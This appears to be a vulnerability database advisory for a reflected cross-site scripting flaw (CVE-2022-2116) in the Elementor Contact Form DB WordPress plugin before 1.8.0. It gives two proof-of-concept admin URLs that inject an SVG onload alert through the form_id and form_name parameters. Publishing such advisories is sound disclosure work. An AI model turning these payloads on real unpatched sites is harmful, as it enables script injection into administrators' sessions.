Lucene search
ZhongFu Su(JrXnm) of WuHan UniversityWPEX-ID:01568DA4-2ECF-4CF9-8030-31868CE0A87AHistoryJul 19, 2022 - 12:00 a.m.
Elementor Contact Form DB < 1.8.0 - Reflected Cross-Site Scripting
2022-07-1900:00:00
ZhongFu Su(JrXnm) of WuHan University
231
elementor contact form
cross-site scripting
reflected
security vulnerability
submission handling
EPSS
0.001
Percentile
40.2%
The plugin does not sanitise and escape some parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
When there is at least one submission:
https://example.com/wp-admin/edit.php?post_type=elementor_cf_db&page=sb_elem_cfd&form_id="><svg/onload=alert(/XSS-id/)>
https://example.com/wp-admin/edit.php?post_type=elementor_cf_db&page=sb_elem_cfd&form_name="><svg/onload=alert(/XSS-name/)>Related
patchstack
patchstack
nvd
nvd
CVE-2022-2116
2022-08-15 11:20:59
wpvulndb
wpvulndb
Elementor Contact Form DB < 1.8.0 - Reflected Cross-Site Scripting
2022-07-19 00:00:00
cvelist
cvelist
prion
prion
Cross site scripting
2022-08-15 11:20:00
cve
cve
CVE-2022-2116
2022-08-15 11:20:59